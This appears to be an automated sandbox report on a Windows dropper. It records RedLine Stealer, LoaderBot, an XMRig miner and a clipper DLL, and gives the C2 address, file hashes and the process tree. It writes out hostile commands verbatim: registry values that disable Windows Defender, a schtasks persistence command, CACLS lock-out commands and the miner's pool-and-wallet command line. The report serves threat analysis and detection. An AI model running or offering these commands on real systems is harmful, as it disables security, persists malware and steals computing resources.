Analysis
-
max time kernel
109s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
23/05/2023, 15:14
Static task
static1
General
-
Target
4278a8fbe7d61b08f0c1fc3baf714c549c04c014808c6fa63054f086e3d94a7b.exe
-
Size
1020KB
-
MD5
5aa0a1282685cfc454548ebcac7e6ad3
-
SHA1
0961921632cef969c4b6e61a92c03504a8ed6187
-
SHA256
4278a8fbe7d61b08f0c1fc3baf714c549c04c014808c6fa63054f086e3d94a7b
-
SHA512
69d919d3eb04fb4fcb3cf0b3b427b2e179bfd93470fb536aaf2c90477d43a883f41ba45c649718ff3e54c3ffe77cbeb620d20c280c7b70d49653e338fd9ff759
-
SSDEEP
24576:VyPSDYAQACyoxJvEU2Sk2Liw/NpUy8QHy8unDh+kyhUa:wPeYYoYQL/MyZHfuDw
Malware Config
Extracted
redline
lupa
83.97.73.122:19062
-
auth_value
6a764aa41830c77712442516d143bc9c
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection o6406813.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" o6406813.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" o6406813.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" o6406813.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" o6406813.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" o6406813.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 21 IoCs
resource yara_rule behavioral1/memory/4916-208-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-211-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-213-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-209-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-215-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-217-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-219-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-221-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-223-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-225-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-227-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-229-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-231-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-233-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-235-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-237-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-239-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-241-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-243-0x0000000004F60000-0x0000000004F9C000-memory.dmp family_redline behavioral1/memory/4916-344-0x0000000002160000-0x0000000002170000-memory.dmp family_redline behavioral1/memory/4916-1121-0x0000000002160000-0x0000000002170000-memory.dmp family_redline -
LoaderBot executable 1 IoCs
resource yara_rule behavioral1/memory/3880-1200-0x0000000000400000-0x00000000007FE000-memory.dmp loaderbot -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/memory/5060-1214-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/5060-1218-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation full_min_cr.exe Key value queried \REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation s8450190.exe Key value queried \REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation legends.exe -
Executes dropped EXE 15 IoCs
pid Process 2172 z0705281.exe 4240 z5350748.exe 2944 o6406813.exe 2156 p6586376.exe 4916 r9766558.exe 4940 s8450190.exe 1868 s8450190.exe 4180 legends.exe 4176 legends.exe 2032 legends.exe 4900 full_min_cr.exe 4968 legends.exe 4640 legends.exe 3880 full_min_cr.exe 5060 Driver.exe -
Loads dropped DLL 1 IoCs
pid Process 4756 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features o6406813.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" o6406813.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" z0705281.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce z5350748.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" z5350748.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce 4278a8fbe7d61b08f0c1fc3baf714c549c04c014808c6fa63054f086e3d94a7b.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 4278a8fbe7d61b08f0c1fc3baf714c549c04c014808c6fa63054f086e3d94a7b.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce z0705281.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4940 set thread context of 1868 4940 s8450190.exe 97 PID 4180 set thread context of 2032 4180 legends.exe 100 PID 4968 set thread context of 4640 4968 legends.exe 113 PID 4900 set thread context of 3880 4900 full_min_cr.exe 114 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4372 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2944 o6406813.exe 2944 o6406813.exe 2156 p6586376.exe 2156 p6586376.exe 4916 r9766558.exe 4916 r9766558.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe 3880 full_min_cr.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 672 Process not Found -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 2944 o6406813.exe Token: SeDebugPrivilege 2156 p6586376.exe Token: SeDebugPrivilege 4916 r9766558.exe Token: SeDebugPrivilege 4940 s8450190.exe Token: SeDebugPrivilege 4180 legends.exe Token: SeDebugPrivilege 4968 legends.exe Token: SeDebugPrivilege 3880 full_min_cr.exe Token: SeLockMemoryPrivilege 5060 Driver.exe Token: SeLockMemoryPrivilege 5060 Driver.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1868 s8450190.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4152 wrote to memory of 2172 4152 4278a8fbe7d61b08f0c1fc3baf714c549c04c014808c6fa63054f086e3d94a7b.exe 83 PID 4152 wrote to memory of 2172 4152 4278a8fbe7d61b08f0c1fc3baf714c549c04c014808c6fa63054f086e3d94a7b.exe 83 PID 4152 wrote to memory of 2172 4152 4278a8fbe7d61b08f0c1fc3baf714c549c04c014808c6fa63054f086e3d94a7b.exe 83 PID 2172 wrote to memory of 4240 2172 z0705281.exe 84 PID 2172 wrote to memory of 4240 2172 z0705281.exe 84 PID 2172 wrote to memory of 4240 2172 z0705281.exe 84 PID 4240 wrote to memory of 2944 4240 z5350748.exe 85 PID 4240 wrote to memory of 2944 4240 z5350748.exe 85 PID 4240 wrote to memory of 2944 4240 z5350748.exe 85 PID 4240 wrote to memory of 2156 4240 z5350748.exe 90 PID 4240 wrote to memory of 2156 4240 z5350748.exe 90 PID 4240 wrote to memory of 2156 4240 z5350748.exe 90 PID 2172 wrote to memory of 4916 2172 z0705281.exe 94 PID 2172 wrote to memory of 4916 2172 z0705281.exe 94 PID 2172 wrote to memory of 4916 2172 z0705281.exe 94 PID 4152 wrote to memory of 4940 4152 4278a8fbe7d61b08f0c1fc3baf714c549c04c014808c6fa63054f086e3d94a7b.exe 96 PID 4152 wrote to memory of 4940 4152 4278a8fbe7d61b08f0c1fc3baf714c549c04c014808c6fa63054f086e3d94a7b.exe 96 PID 4152 wrote to memory of 4940 4152 4278a8fbe7d61b08f0c1fc3baf714c549c04c014808c6fa63054f086e3d94a7b.exe 96 PID 4940 wrote to memory of 1868 4940 s8450190.exe 97 PID 4940 wrote to memory of 1868 4940 s8450190.exe 97 PID 4940 wrote to memory of 1868 4940 s8450190.exe 97 PID 4940 wrote to memory of 1868 4940 s8450190.exe 97 PID 4940 wrote to memory of 1868 4940 s8450190.exe 97 PID 4940 wrote to memory of 1868 4940 s8450190.exe 97 PID 4940 wrote to memory of 1868 4940 s8450190.exe 97 PID 4940 wrote to memory of 1868 4940 s8450190.exe 97 PID 4940 wrote to memory of 1868 4940 s8450190.exe 97 PID 4940 wrote to memory of 1868 4940 s8450190.exe 97 PID 1868 wrote to memory of 4180 1868 s8450190.exe 98 PID 1868 wrote to memory of 4180 1868 s8450190.exe 98 PID 1868 wrote to memory of 4180 1868 s8450190.exe 98 PID 4180 wrote to memory of 4176 4180 legends.exe 99 PID 4180 wrote to memory of 4176 4180 legends.exe 99 PID 4180 wrote to memory of 4176 4180 legends.exe 99 PID 4180 wrote to memory of 4176 4180 legends.exe 99 PID 4180 wrote to memory of 2032 4180 legends.exe 100 PID 4180 wrote to memory of 2032 4180 legends.exe 100 PID 4180 wrote to memory of 2032 4180 legends.exe 100 PID 4180 wrote to memory of 2032 4180 legends.exe 100 PID 4180 wrote to memory of 2032 4180 legends.exe 100 PID 4180 wrote to memory of 2032 4180 legends.exe 100 PID 4180 wrote to memory of 2032 4180 legends.exe 100 PID 4180 wrote to memory of 2032 4180 legends.exe 100 PID 4180 wrote to memory of 2032 4180 legends.exe 100 PID 4180 wrote to memory of 2032 4180 legends.exe 100 PID 2032 wrote to memory of 4372 2032 legends.exe 101 PID 2032 wrote to memory of 4372 2032 legends.exe 101 PID 2032 wrote to memory of 4372 2032 legends.exe 101 PID 2032 wrote to memory of 3248 2032 legends.exe 103 PID 2032 wrote to memory of 3248 2032 legends.exe 103 PID 2032 wrote to memory of 3248 2032 legends.exe 103 PID 3248 wrote to memory of 3888 3248 cmd.exe 105 PID 3248 wrote to memory of 3888 3248 cmd.exe 105 PID 3248 wrote to memory of 3888 3248 cmd.exe 105 PID 3248 wrote to memory of 4460 3248 cmd.exe 106 PID 3248 wrote to memory of 4460 3248 cmd.exe 106 PID 3248 wrote to memory of 4460 3248 cmd.exe 106 PID 3248 wrote to memory of 2156 3248 cmd.exe 107 PID 3248 wrote to memory of 2156 3248 cmd.exe 107 PID 3248 wrote to memory of 2156 3248 cmd.exe 107 PID 3248 wrote to memory of 2316 3248 cmd.exe 108 PID 3248 wrote to memory of 2316 3248 cmd.exe 108 PID 3248 wrote to memory of 2316 3248 cmd.exe 108 PID 3248 wrote to memory of 4720 3248 cmd.exe 109
Processes
-
C:\Users\Admin\AppData\Local\Temp\4278a8fbe7d61b08f0c1fc3baf714c549c04c014808c6fa63054f086e3d94a7b.exe"C:\Users\Admin\AppData\Local\Temp\4278a8fbe7d61b08f0c1fc3baf714c549c04c014808c6fa63054f086e3d94a7b.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4152 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\z0705281.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\z0705281.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\z5350748.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\z5350748.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4240 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\o6406813.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\o6406813.exe4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2944
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\p6586376.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\p6586376.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r9766558.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r9766558.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4916
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s8450190.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s8450190.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s8450190.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s8450190.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe"C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4180 -
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exeC:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe5⤵
- Executes dropped EXE
PID:4176
-
-
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exeC:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legends.exe /TR "C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe" /F6⤵
- Creates scheduled task(s)
PID:4372
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legends.exe" /P "Admin:N"&&CACLS "legends.exe" /P "Admin:R" /E&&echo Y|CACLS "..\41bde21dc7" /P "Admin:N"&&CACLS "..\41bde21dc7" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:3888
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "legends.exe" /P "Admin:N"7⤵PID:4460
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "legends.exe" /P "Admin:R" /E7⤵PID:2156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:2316
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\41bde21dc7" /P "Admin:N"7⤵PID:4720
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\41bde21dc7" /P "Admin:R" /E7⤵PID:4472
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000027001\full_min_cr.exe"C:\Users\Admin\AppData\Local\Temp\1000027001\full_min_cr.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4900 -
C:\Users\Admin\AppData\Local\Temp\1000027001\full_min_cr.exe"{path}"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3880 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 28⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5060
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main6⤵
- Loads dropped DLL
PID:4756
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exeC:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4968 -
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exeC:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe2⤵
- Executes dropped EXE
PID:4640
-
-
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exeC:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe1⤵PID:4704
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD517573558c4e714f606f997e5157afaac
SHA113e16e9415ceef429aaf124139671ebeca09ed23
SHA256c18db6aecad2436da4a63ff26af4e3a337cca48f01c21b8db494fe5ccc60e553
SHA512f4edf13f05a0d142e4dd42802098c8c44988ee8869621a62c2b565a77c9a95857f636583ff8d6d9baa366603d98b9bfbf1fc75bc6f9f8f83c80cb1215b2941cc
-
Filesize
425B
MD54eaca4566b22b01cd3bc115b9b0b2196
SHA1e743e0792c19f71740416e7b3c061d9f1336bf94
SHA25634ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb
SHA512bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1
-
Filesize
2.7MB
MD5e7bf9f0c2c1977ddd8e139c13c27be0d
SHA1e91aff3d9a8c7cef0e9543350864971e4ad93f82
SHA256a615a2c647bce3b67f43c818a7fd972a653a605efce83b7eb6f38fb374ec8eba
SHA512d9961824b178944aec2411c1bb29a5ef4b487ce0c251fe381e2841c6abe00f29ecf895ab1baf93e49442af07a14acdcf9d882519d39beb5c4d4902db2db2560f
-
Filesize
2.7MB
MD5e7bf9f0c2c1977ddd8e139c13c27be0d
SHA1e91aff3d9a8c7cef0e9543350864971e4ad93f82
SHA256a615a2c647bce3b67f43c818a7fd972a653a605efce83b7eb6f38fb374ec8eba
SHA512d9961824b178944aec2411c1bb29a5ef4b487ce0c251fe381e2841c6abe00f29ecf895ab1baf93e49442af07a14acdcf9d882519d39beb5c4d4902db2db2560f
-
Filesize
2.7MB
MD5e7bf9f0c2c1977ddd8e139c13c27be0d
SHA1e91aff3d9a8c7cef0e9543350864971e4ad93f82
SHA256a615a2c647bce3b67f43c818a7fd972a653a605efce83b7eb6f38fb374ec8eba
SHA512d9961824b178944aec2411c1bb29a5ef4b487ce0c251fe381e2841c6abe00f29ecf895ab1baf93e49442af07a14acdcf9d882519d39beb5c4d4902db2db2560f
-
Filesize
2.7MB
MD5e7bf9f0c2c1977ddd8e139c13c27be0d
SHA1e91aff3d9a8c7cef0e9543350864971e4ad93f82
SHA256a615a2c647bce3b67f43c818a7fd972a653a605efce83b7eb6f38fb374ec8eba
SHA512d9961824b178944aec2411c1bb29a5ef4b487ce0c251fe381e2841c6abe00f29ecf895ab1baf93e49442af07a14acdcf9d882519d39beb5c4d4902db2db2560f
-
Filesize
963KB
MD556a231c50ea3234f65c4c5d2a7387752
SHA1879163055926fb01917c3ab87ba385434dee9970
SHA256f04c8cfcfd7db01e0301d76156f0b1d304c40b0cd7d9a6551ff2a41d26f82b85
SHA512d1ee6c91879bfa16b0cea923bc8fd05f4f1e17f9fbad5073c04d190f29e9dfc14ea57986b8413e090b1b011bbed27272c0cc4c2d4f3ca85151661885f9b8d3ee
-
Filesize
963KB
MD556a231c50ea3234f65c4c5d2a7387752
SHA1879163055926fb01917c3ab87ba385434dee9970
SHA256f04c8cfcfd7db01e0301d76156f0b1d304c40b0cd7d9a6551ff2a41d26f82b85
SHA512d1ee6c91879bfa16b0cea923bc8fd05f4f1e17f9fbad5073c04d190f29e9dfc14ea57986b8413e090b1b011bbed27272c0cc4c2d4f3ca85151661885f9b8d3ee
-
Filesize
963KB
MD556a231c50ea3234f65c4c5d2a7387752
SHA1879163055926fb01917c3ab87ba385434dee9970
SHA256f04c8cfcfd7db01e0301d76156f0b1d304c40b0cd7d9a6551ff2a41d26f82b85
SHA512d1ee6c91879bfa16b0cea923bc8fd05f4f1e17f9fbad5073c04d190f29e9dfc14ea57986b8413e090b1b011bbed27272c0cc4c2d4f3ca85151661885f9b8d3ee
-
Filesize
963KB
MD556a231c50ea3234f65c4c5d2a7387752
SHA1879163055926fb01917c3ab87ba385434dee9970
SHA256f04c8cfcfd7db01e0301d76156f0b1d304c40b0cd7d9a6551ff2a41d26f82b85
SHA512d1ee6c91879bfa16b0cea923bc8fd05f4f1e17f9fbad5073c04d190f29e9dfc14ea57986b8413e090b1b011bbed27272c0cc4c2d4f3ca85151661885f9b8d3ee
-
Filesize
963KB
MD556a231c50ea3234f65c4c5d2a7387752
SHA1879163055926fb01917c3ab87ba385434dee9970
SHA256f04c8cfcfd7db01e0301d76156f0b1d304c40b0cd7d9a6551ff2a41d26f82b85
SHA512d1ee6c91879bfa16b0cea923bc8fd05f4f1e17f9fbad5073c04d190f29e9dfc14ea57986b8413e090b1b011bbed27272c0cc4c2d4f3ca85151661885f9b8d3ee
-
Filesize
963KB
MD556a231c50ea3234f65c4c5d2a7387752
SHA1879163055926fb01917c3ab87ba385434dee9970
SHA256f04c8cfcfd7db01e0301d76156f0b1d304c40b0cd7d9a6551ff2a41d26f82b85
SHA512d1ee6c91879bfa16b0cea923bc8fd05f4f1e17f9fbad5073c04d190f29e9dfc14ea57986b8413e090b1b011bbed27272c0cc4c2d4f3ca85151661885f9b8d3ee
-
Filesize
963KB
MD556a231c50ea3234f65c4c5d2a7387752
SHA1879163055926fb01917c3ab87ba385434dee9970
SHA256f04c8cfcfd7db01e0301d76156f0b1d304c40b0cd7d9a6551ff2a41d26f82b85
SHA512d1ee6c91879bfa16b0cea923bc8fd05f4f1e17f9fbad5073c04d190f29e9dfc14ea57986b8413e090b1b011bbed27272c0cc4c2d4f3ca85151661885f9b8d3ee
-
Filesize
963KB
MD556a231c50ea3234f65c4c5d2a7387752
SHA1879163055926fb01917c3ab87ba385434dee9970
SHA256f04c8cfcfd7db01e0301d76156f0b1d304c40b0cd7d9a6551ff2a41d26f82b85
SHA512d1ee6c91879bfa16b0cea923bc8fd05f4f1e17f9fbad5073c04d190f29e9dfc14ea57986b8413e090b1b011bbed27272c0cc4c2d4f3ca85151661885f9b8d3ee
-
Filesize
963KB
MD556a231c50ea3234f65c4c5d2a7387752
SHA1879163055926fb01917c3ab87ba385434dee9970
SHA256f04c8cfcfd7db01e0301d76156f0b1d304c40b0cd7d9a6551ff2a41d26f82b85
SHA512d1ee6c91879bfa16b0cea923bc8fd05f4f1e17f9fbad5073c04d190f29e9dfc14ea57986b8413e090b1b011bbed27272c0cc4c2d4f3ca85151661885f9b8d3ee
-
Filesize
963KB
MD556a231c50ea3234f65c4c5d2a7387752
SHA1879163055926fb01917c3ab87ba385434dee9970
SHA256f04c8cfcfd7db01e0301d76156f0b1d304c40b0cd7d9a6551ff2a41d26f82b85
SHA512d1ee6c91879bfa16b0cea923bc8fd05f4f1e17f9fbad5073c04d190f29e9dfc14ea57986b8413e090b1b011bbed27272c0cc4c2d4f3ca85151661885f9b8d3ee
-
Filesize
963KB
MD556a231c50ea3234f65c4c5d2a7387752
SHA1879163055926fb01917c3ab87ba385434dee9970
SHA256f04c8cfcfd7db01e0301d76156f0b1d304c40b0cd7d9a6551ff2a41d26f82b85
SHA512d1ee6c91879bfa16b0cea923bc8fd05f4f1e17f9fbad5073c04d190f29e9dfc14ea57986b8413e090b1b011bbed27272c0cc4c2d4f3ca85151661885f9b8d3ee
-
Filesize
575KB
MD5fd6154fafaa00dcbd740026d1470fd64
SHA16c75a4675d5a5deece846f3755f3af23880874b2
SHA256c1671a4a3a6536d12daad0ec2bd01245cb65d34c63fde1662f6739c602bb189b
SHA51203fe9f2fa8d36a9a9e0bfb28633d0c59dcfb9d6b4cca979e6af23a05d58b43e7c1c00d7527bb231af93c795c2479d245b1302092455ce085d63d60924152ae08
-
Filesize
575KB
MD5fd6154fafaa00dcbd740026d1470fd64
SHA16c75a4675d5a5deece846f3755f3af23880874b2
SHA256c1671a4a3a6536d12daad0ec2bd01245cb65d34c63fde1662f6739c602bb189b
SHA51203fe9f2fa8d36a9a9e0bfb28633d0c59dcfb9d6b4cca979e6af23a05d58b43e7c1c00d7527bb231af93c795c2479d245b1302092455ce085d63d60924152ae08
-
Filesize
284KB
MD5f5bb09373127faf5d6aa3147ecbcfe2d
SHA15c067ad2f56954888fcb6840c7c23ccac839a34b
SHA2561161b9fce6d3961eb2f8b9dcd996c57b457ebb3a82df1e25d8bf5288217c2093
SHA512e340591fe580b6ca81d14e3a1e398a1e45174dd2050b4baad538609324c79efaffb4910c53bf75406d9b726c1736d1b121d2e7064cd85c0570ae277a9ec87722
-
Filesize
284KB
MD5f5bb09373127faf5d6aa3147ecbcfe2d
SHA15c067ad2f56954888fcb6840c7c23ccac839a34b
SHA2561161b9fce6d3961eb2f8b9dcd996c57b457ebb3a82df1e25d8bf5288217c2093
SHA512e340591fe580b6ca81d14e3a1e398a1e45174dd2050b4baad538609324c79efaffb4910c53bf75406d9b726c1736d1b121d2e7064cd85c0570ae277a9ec87722
-
Filesize
304KB
MD5b2c333aa1ab8da42456c4c20bfcdd9bb
SHA108187aa64176ece430e15b9ad77a1951858134f3
SHA2567364cbedc168df8d4cafaf5d4a5ff78f6797ebd435e54251397481dadf39fb5e
SHA512d73b8ce7d33a12b0f61fa50b137e266bceac26250a695e032cbbbc0db4e6f8f95c9d31411f9df6bb64761908c9a14082ca497436285720e89c95d2bd5438fe3b
-
Filesize
304KB
